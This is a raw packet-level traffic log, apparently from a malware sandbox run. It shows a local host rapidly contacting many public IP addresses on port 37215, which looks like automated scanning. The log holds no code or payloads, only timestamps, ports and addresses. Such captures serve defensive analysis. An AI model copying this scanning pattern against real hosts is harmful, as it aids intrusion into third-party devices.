                                          Jul 26, 2024 17:42:01.960443020 CEST3721514150197.192.99.218192.168.2.15
                                          Jul 26, 2024 17:42:01.960450888 CEST3721514150128.210.223.33192.168.2.15
                                          Jul 26, 2024 17:42:01.960458040 CEST3721514150197.100.159.198192.168.2.15
                                          Jul 26, 2024 17:42:01.960458040 CEST1415037215192.168.2.15123.249.101.104
                                          Jul 26, 2024 17:42:01.960458040 CEST1415037215192.168.2.15157.141.168.114
                                          Jul 26, 2024 17:42:01.960458040 CEST1415037215192.168.2.15197.185.42.136
                                          Jul 26, 2024 17:42:01.960490942 CEST1415037215192.168.2.15197.192.99.218
                                          Jul 26, 2024 17:42:01.960491896 CEST1415037215192.168.2.15197.100.159.198
                                          Jul 26, 2024 17:42:01.960501909 CEST1415037215192.168.2.15128.210.223.33
                                          Jul 26, 2024 17:42:01.961354971 CEST5595037215192.168.2.15197.237.55.185
                                          Jul 26, 2024 17:42:01.961417913 CEST3721514150187.2.62.124192.168.2.15
                                          Jul 26, 2024 17:42:01.961426020 CEST3721514150106.157.24.127192.168.2.15
                                          Jul 26, 2024 17:42:01.961433887 CEST372151415041.233.87.97192.168.2.15
                                          Jul 26, 2024 17:42:01.961450100 CEST1415037215192.168.2.15187.2.62.124
                                          Jul 26, 2024 17:42:01.961464882 CEST1415037215192.168.2.1541.233.87.97
                                          Jul 26, 2024 17:42:01.961498022 CEST1415037215192.168.2.15106.157.24.127
                                          Jul 26, 2024 17:42:01.961556911 CEST372151415072.194.119.143192.168.2.15
                                          Jul 26, 2024 17:42:01.961565971 CEST372151415041.71.87.126192.168.2.15
                                          Jul 26, 2024 17:42:01.961574078 CEST3721514150199.177.172.209192.168.2.15
                                          Jul 26, 2024 17:42:01.961591959 CEST1415037215192.168.2.1572.194.119.143
                                          Jul 26, 2024 17:42:01.961591959 CEST1415037215192.168.2.1541.71.87.126
                                          Jul 26, 2024 17:42:01.961607933 CEST1415037215192.168.2.15199.177.172.209
                                          Jul 26, 2024 17:42:01.961635113 CEST3721514150157.79.31.23192.168.2.15
                                          Jul 26, 2024 17:42:01.961644888 CEST372151415041.98.155.52192.168.2.15
                                          Jul 26, 2024 17:42:01.961652040 CEST3721514150197.14.134.65192.168.2.15
                                          Jul 26, 2024 17:42:01.961658955 CEST3721514150157.166.67.216192.168.2.15
                                          Jul 26, 2024 17:42:01.961667061 CEST3721514150157.232.73.119192.168.2.15
                                          Jul 26, 2024 17:42:01.961668015 CEST1415037215192.168.2.15157.79.31.23
                                          Jul 26, 2024 17:42:01.961668968 CEST1415037215192.168.2.1541.98.155.52
                                          Jul 26, 2024 17:42:01.961675882 CEST372151415042.24.106.31192.168.2.15
                                          Jul 26, 2024 17:42:01.961683989 CEST3721514150157.171.58.37192.168.2.15
                                          Jul 26, 2024 17:42:01.961690903 CEST1415037215192.168.2.15197.14.134.65
                                          Jul 26, 2024 17:42:01.961700916 CEST3721514150197.93.43.13192.168.2.15
                                          Jul 26, 2024 17:42:01.961705923 CEST1415037215192.168.2.15157.232.73.119
                                          Jul 26, 2024 17:42:01.961705923 CEST1415037215192.168.2.1542.24.106.31
                                          Jul 26, 2024 17:42:01.961714983 CEST3721514150205.111.49.207192.168.2.15
                                          Jul 26, 2024 17:42:01.961724997 CEST3721514150197.237.249.128192.168.2.15
                                          Jul 26, 2024 17:42:01.961734056 CEST3721514150197.198.63.31192.168.2.15
                                          Jul 26, 2024 17:42:01.961756945 CEST1415037215192.168.2.15205.111.49.207
                                          Jul 26, 2024 17:42:01.961756945 CEST1415037215192.168.2.15197.237.249.128
                                          Jul 26, 2024 17:42:01.961760998 CEST1415037215192.168.2.15157.171.58.37
                                          Jul 26, 2024 17:42:01.961760998 CEST1415037215192.168.2.15197.198.63.31
                                          Jul 26, 2024 17:42:01.961815119 CEST3721514150197.23.61.116192.168.2.15
                                          Jul 26, 2024 17:42:01.961823940 CEST372151415041.144.189.163192.168.2.15
                                          Jul 26, 2024 17:42:01.961832047 CEST3721514150117.184.100.177192.168.2.15
                                          Jul 26, 2024 17:42:01.961839914 CEST372151415041.74.98.38192.168.2.15
                                          Jul 26, 2024 17:42:01.961843014 CEST372151415074.21.39.92192.168.2.15
                                          Jul 26, 2024 17:42:01.961848021 CEST372151415041.232.39.4192.168.2.15
                                          Jul 26, 2024 17:42:01.961852074 CEST1415037215192.168.2.15197.23.61.116
                                          Jul 26, 2024 17:42:01.961855888 CEST3721514150197.107.155.114192.168.2.15
                                          Jul 26, 2024 17:42:01.961868048 CEST1415037215192.168.2.15117.184.100.177
                                          Jul 26, 2024 17:42:01.961868048 CEST1415037215192.168.2.1541.74.98.38
                                          Jul 26, 2024 17:42:01.961885929 CEST1415037215192.168.2.15157.166.67.216
                                          Jul 26, 2024 17:42:01.961885929 CEST1415037215192.168.2.1541.232.39.4
                                          Jul 26, 2024 17:42:01.961888075 CEST1415037215192.168.2.1574.21.39.92
                                          Jul 26, 2024 17:42:01.961891890 CEST1415037215192.168.2.15197.93.43.13
                                          Jul 26, 2024 17:42:01.961891890 CEST1415037215192.168.2.1541.144.189.163
                                          Jul 26, 2024 17:42:01.961891890 CEST1415037215192.168.2.15197.107.155.114
                                          Jul 26, 2024 17:42:01.961941957 CEST3721514150157.121.141.238192.168.2.15
                                          Jul 26, 2024 17:42:01.961950064 CEST3721514150157.197.185.71192.168.2.15
                                          Jul 26, 2024 17:42:01.961957932 CEST372151415041.167.107.191192.168.2.15
                                          Jul 26, 2024 17:42:01.961963892 CEST3721514150157.13.106.4192.168.2.15
                                          Jul 26, 2024 17:42:01.961987019 CEST1415037215192.168.2.15157.197.185.71
                                          Jul 26, 2024 17:42:01.961992025 CEST1415037215192.168.2.15157.121.141.238
                                          Jul 26, 2024 17:42:01.962033987 CEST1415037215192.168.2.15157.13.106.4
                                          Jul 26, 2024 17:42:01.962034941 CEST1415037215192.168.2.1541.167.107.191
                                          Jul 26, 2024 17:42:01.962990046 CEST5441837215192.168.2.15172.114.80.126
                                          Jul 26, 2024 17:42:01.963603020 CEST372151415041.190.146.226192.168.2.15
                                          Jul 26, 2024 17:42:01.963612080 CEST372151415041.150.211.103192.168.2.15
                                          Jul 26, 2024 17:42:01.963615894 CEST372151415041.68.139.29192.168.2.15
                                          Jul 26, 2024 17:42:01.963632107 CEST372151415041.227.84.105192.168.2.15
                                          Jul 26, 2024 17:42:01.963640928 CEST1415037215192.168.2.1541.150.211.103
                                          Jul 26, 2024 17:42:01.963645935 CEST372151415024.103.209.161192.168.2.15
                                          Jul 26, 2024 17:42:01.963654041 CEST3721514150197.224.46.253192.168.2.15
                                          Jul 26, 2024 17:42:01.963660002 CEST3721514150139.14.159.31192.168.2.15
                                          Jul 26, 2024 17:42:01.963668108 CEST3721514150201.93.30.9192.168.2.15
                                          Jul 26, 2024 17:42:01.963675976 CEST3721514150197.116.169.227192.168.2.15
                                          Jul 26, 2024 17:42:01.963680029 CEST3721514150157.240.134.171192.168.2.15
                                          Jul 26, 2024 17:42:01.963680029 CEST1415037215192.168.2.1541.227.84.105
                                          Jul 26, 2024 17:42:01.963685989 CEST1415037215192.168.2.1541.190.146.226
                                          Jul 26, 2024 17:42:01.963685989 CEST1415037215192.168.2.15139.14.159.31
                                          Jul 26, 2024 17:42:01.963687897 CEST3721514150197.68.12.38192.168.2.15
                                          Jul 26, 2024 17:42:01.963697910 CEST3721514150187.94.210.128192.168.2.15
                                          Jul 26, 2024 17:42:01.963702917 CEST1415037215192.168.2.15201.93.30.9
                                          Jul 26, 2024 17:42:01.963704109 CEST1415037215192.168.2.15197.224.46.253
                                          Jul 26, 2024 17:42:01.963710070 CEST3721514150157.116.16.138192.168.2.15
                                          Jul 26, 2024 17:42:01.963718891 CEST372151415041.15.202.252192.168.2.15
                                          Jul 26, 2024 17:42:01.963726997 CEST3721514150185.51.208.67192.168.2.15
                                          Jul 26, 2024 17:42:01.963732004 CEST1415037215192.168.2.15197.68.12.38
                                          Jul 26, 2024 17:42:01.963733912 CEST3721514150189.212.24.162192.168.2.15
                                          Jul 26, 2024 17:42:01.963735104 CEST1415037215192.168.2.15187.94.210.128
                                          Jul 26, 2024 17:42:01.963742018 CEST3721514150157.181.159.247192.168.2.15
                                          Jul 26, 2024 17:42:01.963748932 CEST1415037215192.168.2.1524.103.209.161
                                          Jul 26, 2024 17:42:01.963748932 CEST1415037215192.168.2.15157.116.16.138
                                          Jul 26, 2024 17:42:01.963749886 CEST3721514150157.34.226.89192.168.2.15
                                          Jul 26, 2024 17:42:01.963751078 CEST1415037215192.168.2.1541.15.202.252
                                          Jul 26, 2024 17:42:01.963751078 CEST1415037215192.168.2.15185.51.208.67
                                          Jul 26, 2024 17:42:01.963758945 CEST3721514150197.159.16.91192.168.2.15
                                          Jul 26, 2024 17:42:01.963768005 CEST372151415041.176.46.30192.168.2.15
                                          Jul 26, 2024 17:42:01.963773012 CEST1415037215192.168.2.15157.181.159.247
                                          Jul 26, 2024 17:42:01.963776112 CEST3721514150157.238.174.45192.168.2.15
                                          Jul 26, 2024 17:42:01.963783026 CEST372151415041.217.247.118192.168.2.15
                                          Jul 26, 2024 17:42:01.963789940 CEST1415037215192.168.2.15157.34.226.89
                                          Jul 26, 2024 17:42:01.963792086 CEST3721514150134.217.74.218192.168.2.15
                                          Jul 26, 2024 17:42:01.963799000 CEST1415037215192.168.2.1541.176.46.30
                                          Jul 26, 2024 17:42:01.963799953 CEST3721514150157.56.147.132192.168.2.15
                                          Jul 26, 2024 17:42:01.963803053 CEST1415037215192.168.2.15157.238.174.45
                                          Jul 26, 2024 17:42:01.963809967 CEST372151415041.122.226.131192.168.2.15
                                          Jul 26, 2024 17:42:01.963816881 CEST1415037215192.168.2.1541.68.139.29
                                          Jul 26, 2024 17:42:01.963816881 CEST1415037215192.168.2.15189.212.24.162
                                          Jul 26, 2024 17:42:01.963816881 CEST1415037215192.168.2.15157.240.134.171
                                          Jul 26, 2024 17:42:01.963816881 CEST1415037215192.168.2.1541.217.247.118
                                          Jul 26, 2024 17:42:01.963816881 CEST1415037215192.168.2.15134.217.74.218
                                          Jul 26, 2024 17:42:01.963829041 CEST3721514150191.222.104.243192.168.2.15
                                          Jul 26, 2024 17:42:01.963836908 CEST3721514150197.150.236.87192.168.2.15
                                          Jul 26, 2024 17:42:01.963838100 CEST1415037215192.168.2.1541.122.226.131
                                          Jul 26, 2024 17:42:01.963845015 CEST3721514150197.24.218.59192.168.2.15
                                          Jul 26, 2024 17:42:01.963852882 CEST3721514150197.222.81.202192.168.2.15
                                          Jul 26, 2024 17:42:01.963860035 CEST3721514150157.103.142.99192.168.2.15
                                          Jul 26, 2024 17:42:01.963867903 CEST372151415041.108.90.174192.168.2.15
                                          Jul 26, 2024 17:42:01.963867903 CEST1415037215192.168.2.15191.222.104.243
                                          Jul 26, 2024 17:42:01.963867903 CEST1415037215192.168.2.15197.150.236.87
                                          Jul 26, 2024 17:42:01.963876009 CEST3721514150197.170.105.186192.168.2.15
                                          Jul 26, 2024 17:42:01.963881969 CEST1415037215192.168.2.15197.24.218.59
                                          Jul 26, 2024 17:42:01.963884115 CEST372151415041.79.95.86192.168.2.15
                                          Jul 26, 2024 17:42:01.963891029 CEST1415037215192.168.2.1541.108.90.174
                                          Jul 26, 2024 17:42:01.963891983 CEST1415037215192.168.2.15157.103.142.99
                                          Jul 26, 2024 17:42:01.963897943 CEST3721514150221.34.45.200192.168.2.15
                                          Jul 26, 2024 17:42:01.963907003 CEST3721514150114.221.176.88192.168.2.15
                                          Jul 26, 2024 17:42:01.963910103 CEST1415037215192.168.2.15197.170.105.186
                                          Jul 26, 2024 17:42:01.963916063 CEST3721514150157.152.24.65192.168.2.15
                                          Jul 26, 2024 17:42:01.963923931 CEST372151415066.76.208.188192.168.2.15
                                          Jul 26, 2024 17:42:01.963929892 CEST1415037215192.168.2.15157.56.147.132
                                          Jul 26, 2024 17:42:01.963929892 CEST1415037215192.168.2.15221.34.45.200
                                          Jul 26, 2024 17:42:01.963932037 CEST372151415041.76.185.3192.168.2.15
                                          Jul 26, 2024 17:42:01.963932037 CEST1415037215192.168.2.1541.79.95.86
                                          Jul 26, 2024 17:42:01.963939905 CEST372151415089.133.172.27192.168.2.15
                                          Jul 26, 2024 17:42:01.963948011 CEST372151415041.201.183.22192.168.2.15
                                          Jul 26, 2024 17:42:01.963948965 CEST1415037215192.168.2.15157.152.24.65
                                          Jul 26, 2024 17:42:01.963958025 CEST372151415018.216.116.163192.168.2.15
                                          Jul 26, 2024 17:42:01.963967085 CEST372151415041.225.198.125192.168.2.15
                                          Jul 26, 2024 17:42:01.963973999 CEST1415037215192.168.2.1589.133.172.27
                                          Jul 26, 2024 17:42:01.963973999 CEST1415037215192.168.2.1541.201.183.22
                                          Jul 26, 2024 17:42:01.963974953 CEST3721514150114.119.153.135192.168.2.15
                                          Jul 26, 2024 17:42:01.963983059 CEST3721514150197.40.196.170192.168.2.15
                                          Jul 26, 2024 17:42:01.963990927 CEST372151415041.43.54.3192.168.2.15
                                          Jul 26, 2024 17:42:01.963995934 CEST1415037215192.168.2.1518.216.116.163
                                          Jul 26, 2024 17:42:01.963998079 CEST372151415041.247.4.203192.168.2.15
                                          Jul 26, 2024 17:42:01.964005947 CEST3721514150157.31.70.151192.168.2.15
                                          Jul 26, 2024 17:42:01.964008093 CEST1415037215192.168.2.15197.222.81.202
                                          Jul 26, 2024 17:42:01.964008093 CEST1415037215192.168.2.1566.76.208.188
                                          Jul 26, 2024 17:42:01.964008093 CEST1415037215192.168.2.1541.225.198.125
                                          Jul 26, 2024 17:42:01.964015961 CEST1415037215192.168.2.15197.40.196.170
                                          Jul 26, 2024 17:42:01.964021921 CEST372151415041.101.178.90192.168.2.15
                                          Jul 26, 2024 17:42:01.964025021 CEST1415037215192.168.2.1541.247.4.203
                                          Jul 26, 2024 17:42:01.964034081 CEST3721514150157.178.2.174192.168.2.15
                                          Jul 26, 2024 17:42:01.964044094 CEST3721514150197.41.246.36192.168.2.15
                                          Jul 26, 2024 17:42:01.964050055 CEST372151415041.106.197.1192.168.2.15</